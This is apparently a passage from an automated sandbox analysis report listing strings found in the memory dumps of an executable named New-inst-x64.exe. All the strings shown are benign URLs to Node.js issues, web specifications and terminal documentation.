      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/heycam/webidl/pull/946.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
      Source: New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mafintosh/pump
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/31074
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/32887
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35941
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
      Source: New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2-headers.tar.gz
